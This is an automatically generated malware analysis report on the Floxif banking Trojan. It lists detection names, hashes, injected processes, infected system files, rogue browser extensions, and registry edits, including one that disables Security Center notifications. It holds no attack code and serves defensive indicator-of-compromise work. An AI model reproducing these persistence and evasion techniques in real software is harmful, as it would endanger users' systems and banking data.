Win32.Floxif.A_d05091a518

by malwarelabrobot on June 26th, 2017 in Malware Descriptions.

Win32.Floxif.A (BitDefender), Virus:Win32/Floxif.H (Microsoft), Virus.Win32.Pioneer.cz (Kaspersky), Virus.Win32.Floxif.a (v) (VIPRE), Win32.Expiro.60 (DrWeb), Win32.Floxif.A (B) (Emsisoft), Dropper-FIY!D05091A5183A (McAfee), W32.Fixflo.B!inf (Symantec), Virus.Win32.Floxif (Ikarus), Win32.Floxif.A (FSecure), Win32:FloxLib-A [Trj] (AVG), Win32:FloxLib-A [Trj] (Avast), Win32.Floxif.A (AdAware), Trojan.Win32.Swrort.3.FD, BankerGeneric.YR, VirusExpiro.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Virus


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: d05091a5183a017c7e34c58cab581114
SHA1: b418f5031ad1b506a11d7a0750d30bd182bada94
SHA256: e3cd878ff1e2e796822c230e69274fbb2bb516018dd8c521745f557f4bca38f9
SSDeep:
Size: 6069703 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftWindowsShortcutfile
Company: no certificate found
Created at: 2014-12-09 23:53:04
Analyzed on: Windows7 SP1 32-bit


Summary:

Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

GoogleUpdate.exe:3964
GoogleUpdate.exe:1732
WerFault.exe:2860
GoogleCrashHandler.exe:3160
wermgr.exe:1872

The Trojan injects its code into the following process(es):

GoogleUpdate.exe:3580
GoogleUpdate.exe:764
GoogleUpdate.exe:2512
%original file name%.exe:3308
UI0Detect.exe:1988

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process GoogleUpdate.exe:3964 makes changes in the file system.
The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\{91FFD604-A7C6-4C94-A4B1-9E2A203C0675} (0 bytes)
C:\Windows\Temp\GUR5198.tmp (0 bytes)

The process GoogleUpdate.exe:1732 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\WinPcap\rpcapd.vir (618 bytes)
%Program Files%\WinPcap\rpcapd.exe (4185 bytes)

The Trojan deletes the following file(s):

%Program Files%\WinPcap\rpcapd.vir (0 bytes)

The process GoogleUpdate.exe:764 makes changes in the file system.
The Trojan deletes the following file(s):

%Program Files%\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\54.0.2840.59\54.0.2840.59_chrome_installer.exe (0 bytes)

The process WerFault.exe:2860 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Temp\WER70CF.tmp.mdmp (253992 bytes)
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_infocard.exe_8060ea5cf72f7ed4ea9dabaad12d7232cfb73317_cab_0b387168\WER70CF.tmp.mdmp (15278 bytes)
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_infocard.exe_8060ea5cf72f7ed4ea9dabaad12d7232cfb73317_cab_0b387168\WER68A3.tmp.hdmp (175902 bytes)
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_infocard.exe_8060ea5cf72f7ed4ea9dabaad12d7232cfb73317_cab_0b387168\WER6893.tmp.WERInternalMetadata.xml (3 bytes)
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_infocard.exe_8060ea5cf72f7ed4ea9dabaad12d7232cfb73317_cab_0b387168\Report.wer (171900 bytes)
C:\Windows\Temp\WER68A3.tmp.hdmp (625104 bytes)
C:\Windows\Temp\WER67E6.tmp.appcompat.txt (12806 bytes)
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_infocard.exe_8060ea5cf72f7ed4ea9dabaad12d7232cfb73317_cab_0b387168\WER67E6.tmp.appcompat.txt (31 bytes)
C:\Windows\Temp\WER6893.tmp.WERInternalMetadata.xml (53648 bytes)

The Trojan deletes the following file(s):

C:\Windows\Temp\WER70CF.tmp (0 bytes)
C:\Windows\Temp\WER70CF.tmp.mdmp (0 bytes)
C:\Windows\Temp\WER68A3.tmp (0 bytes)
C:\Windows\Temp\WER67E6.tmp (0 bytes)
C:\Windows\Temp\WER68A3.tmp.hdmp (0 bytes)
C:\Windows\Temp\WER67E6.tmp.appcompat.txt (0 bytes)
C:\Windows\Temp\WER6893.tmp (0 bytes)
C:\Windows\Temp\WER6893.tmp.WERInternalMetadata.xml (0 bytes)

The process %original file name%.exe:3308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\ehome\ehrecvr.vir (1 bytes)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.vir (597 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab47C9.tmp (51 bytes)
%Program Files%\Google\Update\GoogleUpdate.exe (4185 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\extensions\{ec9032c7-c20a-464f-7b0e-13a3a9e97385}\chrome.manifest (522 bytes)
%Program Files%\Windows Media Player\wmpnetwk.vir (1 bytes)
C:\Windows\Microsoft.NET\Framework\v3.0\windows communication foundation\infocard.exe (8657 bytes)
%Program Files%\Windows Media Player\wmpnetwk.exe (10177 bytes)
C:\Windows\ehome\ehrecvr.exe (7433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\extensions\{ec9032c7-c20a-464f-7b0e-13a3a9e97385}\chrome\content.jar (8 bytes)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe (4185 bytes)
%Program Files%\Common Files\System\symsrv.dll (138 bytes)
C:\Windows\ehome\ehsched.exe (4185 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.vir (568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\verify[1].htm (17 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\extensions.ini (312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WR9EBAB457N7WZ2G6KN2.temp (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E7EC0C85688F4738F3BE49B104BA67 (782 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\app_cc_pro_trialkey[1].htm (24 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar47CA.tmp (2712 bytes)
%Program Files%\Internet Explorer\iexplore.exe (7971 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\extensions\{ec9032c7-c20a-464f-7b0e-13a3a9e97385}\install.rdf (874 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dlddmedljhmbgdhapibnagaanenmajcm\1.0_0\manifest.json (321 bytes)
C:\Windows\ehome\ehsched.vir (602 bytes)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe (3361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\extensions\{ec9032c7-c20a-464f-7b0e-13a3a9e97385}\components\red.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dlddmedljhmbgdhapibnagaanenmajcm\1.0_0\background.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\ACF244F1A10D4DBED0D88EBA0C43A9B5_16756CC7371BB76A269719AA1471E96C (1476 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\ACF244F1A10D4DBED0D88EBA0C43A9B5_16756CC7371BB76A269719AA1471E96C (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E7EC0C85688F4738F3BE49B104BA67 (260 bytes)
%Program Files%\Google\Update\googleupdate.vir (650 bytes)
C:\Windows\Microsoft.NET\Framework\v3.0\windows communication foundation\infocard.vir (1 bytes)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.vir (538 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe (3361 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dlddmedljhmbgdhapibnagaanenmajcm\1.0_0\content.js (1 bytes)
%Program Files%\Internet Explorer\iexplore.vir (1 bytes)

The Trojan deletes the following file(s):

C:\Windows\ehome\ehsched.vir (0 bytes)
C:\Windows\ehome\ehrecvr.vir (0 bytes)
%Program Files%\Google\Update\googleupdate.vir (0 bytes)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.vir (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab47C9.tmp (0 bytes)
%Program Files%\Windows Media Player\wmpnetwk.vir (0 bytes)
C:\Windows\Microsoft.NET\Framework\v3.0\windows communication foundation\infocard.vir (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\cookies.sqlite-wal (0 bytes)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.vir (0 bytes)
%Program Files%\Internet Explorer\iexplore.vir (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\webappsstore.sqlite-shm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\webappsstore.sqlite-wal (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.vir (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\cookies.sqlite-shm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar47CA.tmp (0 bytes)

The process wermgr.exe:1872 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_infocard.exe_8060ea5cf72f7ed4ea9dabaad12d7232cfb73317_cab_0b387168\Report.wer.tmp (175218 bytes)

Registry activity

The process GoogleUpdate.exe:3580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Google\Update]
"LastStartedAU" = "1498386145"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Google\Update]
"uid"
"old-uid"

The process GoogleUpdate.exe:3964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Google\Update\proxy]
"source" = "IEWPAD"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Google\Update]
"uid"
"old-uid"

The process GoogleUpdate.exe:1732 makes changes in the system registry.
The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Google\Update]
"uid"
"old-uid"

The process GoogleUpdate.exe:764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"RollCallDayStartSec" = "1498374000"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"pv" = "54.0.2840.59"

[HKLM\SOFTWARE\Google\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}\CurrentState]
"StateValue" = "3"

[HKLM\SOFTWARE\Google\Update\PersistedPings\{6B55E70F-B577-4FE9-BAAB-42AACD4CA601}]
"PersistedPingString" = ""

[HKLM\SOFTWARE\Google\Update\PersistedPings\{E9A6E06C-20BD-4D5B-8AB2-2DFD7D8113CA}]
"PersistedPingString" = ""

[HKLM\SOFTWARE\Google\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableSince" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"dr" = "0"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"DayOfLastRollCall" = "3828"

[HKLM\SOFTWARE\Google\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableCount" = "1"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ActivePingDayStartSec" = "1498374000"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"DayOfLastRollCall" = "3828"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"DayOfLastActivity" = "3828"

[HKLM\SOFTWARE\Google\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}\cohort]
"Hint" = ""

[HKCU\Software\Google\Update\proxy]
"source" = "IEWPAD"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}\cohort]
"Hint" = ""

[HKLM\SOFTWARE\Google\Update\PersistedPings\{E9A6E06C-20BD-4D5B-8AB2-2DFD7D8113CA}]
"PersistedPingTime" = "131428597807316965"

[HKCU\Software\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"dr" = "0"

[HKLM\SOFTWARE\Google\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"DayOfLastRollCall" = "3828"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"RollCallDayStartSec" = "1498374000"
"ping_freshness" = "{760D7A4D-8106-4457-BE57-A4F1DCAE11C4}"

[HKLM\SOFTWARE\Google\Update]
"LastChecked" = "1498386180"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}\cohort]
"(Default)" = "1:b8:"

[HKLM\SOFTWARE\Google\Update\PersistedPings\{6B55E70F-B577-4FE9-BAAB-42AACD4CA601}]
"PersistedPingTime" = "131428597777364912"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"pv" = "54.0.2840.59"

[HKLM\SOFTWARE\Google\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.31.5"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}\cohort]
"Name" = "Stable"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ping_freshness" = "{37FF8F7F-F6BF-4538-9AD0-F9511DE82D85}"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ActivePingDayStartSec" = "1498374000"

[HKLM\SOFTWARE\Google\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}\cohort]
"Name" = "Everyone Else"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"DayOfLastActivity" = "3828"

[HKLM\SOFTWARE\Google\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"ping_freshness" = "{0D75E0D1-04AE-4B01-87C2-9B43044B3C37}"

[HKLM\SOFTWARE\Google\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}\cohort]
"(Default)" = "1:9co:"

[HKLM\SOFTWARE\Google\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}\CurrentState]
"DownloadProgressPercent" = "0"
"DownloadTimeRemainingMs" = "4294967295"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"LastCheckSuccess" = "1498386180"

[HKLM\SOFTWARE\Google\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"RollCallDayStartSec" = "1498374000"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}\CurrentState]
[HKLM\SOFTWARE\Google\Update\PersistedPings\{6B55E70F-B577-4FE9-BAAB-42AACD4CA601}]
[HKLM\SOFTWARE\Google\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}\CurrentState]
[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}\CurrentState]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Google\Update]
"uid"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"UpdateAvailableCount"
"dr"

[HKLM\SOFTWARE\Google\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"tttoken"

[HKLM\SOFTWARE\Google\Update]
"old-uid"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"tttoken"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"dr"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"UpdateAvailableSince"

The process GoogleUpdate.exe:2512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Security Center\Svc\S-1-5-21-732923889-1296844034-1208581001-1000]
"EnableNotifications" = "0"

[HKLM\SOFTWARE\Google\Update]
"LastCodeRedCheck" = "Type: REG_QWORD, Length: 8"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Google\Update]
"uid"
"old-uid"

The process WerFault.exe:2860 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\153]
"_FileId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14C]
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\148]
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14A]
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\149]
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[HKU\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting\Debug]
"StoreLocation" = "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_infocard.exe_8060ea5cf72f7ed4ea9dabaad12d7232cfb73317_cab_0b387168"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\153\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"10000000030FC" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Debug]
"StoreLocation" = "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_infocard.exe_8060ea5cf72f7ed4ea9dabaad12d7232cfb73317_cab_0b387168"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14D\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"10000000030DB" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\153]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\146]
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\147]
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\000000000000057A]
"ObjectId" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14C]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14B]
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000587]
"ObjectId" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000582]
"ObjectId" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14D]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore]
"_CurrentObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\10000000030F3]
"152" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\151]
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\149\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"10000000044D4" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\155]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14D]
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000583]
"ObjectLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\151]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\10000000030DB]
"14D" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14A]
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14C\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"10000000044D7" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\155]
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000589]
"ObjectLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000584]
"ObjectLru" = "Type: REG_QWORD, Length: 8"
"ObjectId" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14E]
"_FileId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\000000000000057D]
"ObjectLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\10000000044D7]
"14C" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\145]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\150]
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14E]
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000589]
"ObjectId" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\145]
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\148]
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14A\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"10000000044D5" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14F]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\152]
"_FileId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\154\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"10000000055E3" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14E]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\000000000000057E]
"ObjectId" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000585]
"ObjectLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14F]
"_FileId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\148]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\145]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14E\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"10000000030DC" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\147]
"_FileId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\100000000305C]
"145" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\150]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\10000000030F2]
"151" = "Type: REG_QWORD, Length: 8"

